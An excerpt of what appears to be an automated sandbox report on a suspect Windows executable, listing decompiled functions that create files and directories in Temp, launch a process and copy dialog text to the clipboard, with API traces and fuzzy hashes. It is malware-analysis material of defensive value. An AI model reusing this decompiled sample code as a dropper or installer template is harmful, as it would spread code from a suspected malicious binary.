                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                    • String ID:
                    • API String ID: 2547128583-0
                    • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                    • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
                    • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                    • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040615E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E0040615E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                    0x00406162
                    0x0040616f
                    0x00406184
                    0x0040618a

                    APIs
                    • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\inlaww321345.exe,80000000,00000003), ref: 00406162
                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                    • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                    • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                    • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406139(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                    0x0040613e
                    0x00406144
                    0x00406149
                    0x00406152
                    0x00406152
                    0x0040615b

                    APIs
                    • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405C1C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405C1C(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                    0x00405c22
                    0x00405c2a
                    0x00000000
                    0x00405c30
                    0x00000000

                    APIs
                    • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                    • GetLastError.KERNEL32 ref: 00405C30
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CreateDirectoryErrorLast
                    • String ID:
                    • API String ID: 1375471231-0
                    • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                    • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
                    • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                    • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406210 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406210(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                    0x00406214
                    0x00406224
                    0x0040622c
                    0x00000000
                    0x00406233
                    0x00000000
                    0x00406235

                    APIs
                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00790349,0078B730,0040357F,0078B730,00790349,0040CE68,00793730,00004000,?,00000000,004033A9), ref: 00406224
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004061E1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004061E1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                    0x004061e5
                    0x004061f5
                    0x004061fd
                    0x00000000
                    0x00406204
                    0x00000000
                    0x00406206

                    APIs
                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00793730,0078B730,004035FB,?,?,004034FF,00793730,00004000,?,00000000,004033A9), ref: 004061F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004035FE Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004035FE(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                    0x0040360c
                    0x00403612

                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056D0(0xffffffeb, _t7);
				_t9 = E00405C51(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE6(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                    0x00401faa
                    0x00401faf
                    0x00401fb5
                    0x00401fba
                    0x00401fbe
                    0x0040292e
                    0x00401fc4
                    0x00401fc7
                    0x00401fca
                    0x00401fd2
                    0x00401fe1
                    0x00401fe3
                    0x00401fe3
                    0x00401fd4
                    0x00401fd8
                    0x00401fd8
                    0x00401fd2
                    0x00401fea
                    0x00401feb
                    0x00401feb
                    0x00402c2d
                    0x00402c39

                    APIs
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                      • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                      • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                      • Part of subcall function 00405C51: CreateProcessW.KERNELBASE ref: 00405C7A
                      • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB
                      • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                      • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                      • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                    • String ID:
                    • API String ID: 2972824698-0
                    • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                    • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
                    • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                    • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0040580F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a84;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f88;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a7a6c == _t156) {
							ShowWindow( *0x7a8aa8, 8);
							if( *0x7a8b2c == _t156) {
								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
							}
							E004045A3(_t171);
							goto L25;
						}
						 *0x7a0758 = 2;
						E004045A3(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404631(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a70, _t156);
						ShowWindow(_t169, 8);
						E004045FF(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8ab0;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a84 = _t134;
				_v8 = _t134;
				E004045FF( *0x7a7a70);
				 *0x7a7a74 = E00404F58(4);
				 *0x7a7a8c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045CA(_a4);
				if(( *0x7a8ab8 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a70, _t156);
					if(( *0x7a8ab8 & 0x00000002) != 0) {
						 *0x7a7a70 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045FF( *0x7a7a68);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8ab8 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                    0x00405817
                    0x0040581d
                    0x00405827
                    0x0040582a
                    0x004059c0
                    0x004059e4
                    0x004059e4
                    0x004059f7
                    0x00405a15
                    0x00405a17
                    0x00405a1f
                    0x00405a75
                    0x00405a79
                    0x00000000
                    0x00000000
                    0x00405a7b
                    0x00405a81
                    0x00000000
                    0x00000000
                    0x00405a8b
                    0x00405a93
                    0x00405a96
                    0x00405b98
                    0x00000000
                    0x00405b98
                    0x00405aa5
                    0x00405ab0
                    0x00405ab9
                    0x00405ac4
                    0x00405ac7
                    0x00405ad0
                    0x00405ad6
                    0x00405ad9
                    0x00405ad9
                    0x00405af1
                    0x00405afa
                    0x00405afd
                    0x00405b04
                    0x00405b0b
                    0x00405b13
                    0x00405b13
                    0x00405b2a
                    0x00405b2a
                    0x00405b31
                    0x00405b37
                    0x00405b43
                    0x00405b4a
                    0x00405b53
                    0x00405b55
                    0x00405b58
                    0x00405b67
                    0x00405b6a
                    0x00405b70
                    0x00405b71
                    0x00405b77
                    0x00405b78
                    0x00405b79
                    0x00405b81
                    0x00405b8c
                    0x00405b92
                    0x00405b92
                    0x00000000
                    0x00405af1
                    0x00405a27
                    0x00405a57
                    0x00405a5f
                    0x00405a6a
                    0x00405a6a
                    0x00405a70
                    0x00000000
                    0x00405a70
                    0x00405a2b
                    0x00405a35
                    0x00000000
                    0x004059f9
                    0x004059ff
                    0x00405a3a
                    0x00000000
                    0x00405a43
                    0x00405a08
                    0x00405a0d
                    0x00405a10
                    0x00000000
                    0x00405a10
                    0x004059f7
                    0x00405830
                    0x00405834
                    0x0040583c
                    0x00405840
                    0x00405843
                    0x00405846
                    0x00405849
                    0x0040584c
                    0x0040584d
                    0x0040584e
                    0x00405867
                    0x0040586a
                    0x00405874
                    0x00405883
                    0x0040588b
                    0x00405893
                    0x00405898
                    0x0040589b
                    0x004058a7
                    0x004058b0
                    0x004058b9
                    0x004058db
                    0x004058e1
                    0x004058f2
                    0x004058f7
                    0x00405905
                    0x00405913
                    0x00405913
                    0x00405918
                    0x00405926
                    0x00405926
                    0x0040592b
                    0x0040592e
                    0x00405933
                    0x0040593f
                    0x00405948
                    0x00405955
                    0x00405964
                    0x00405957
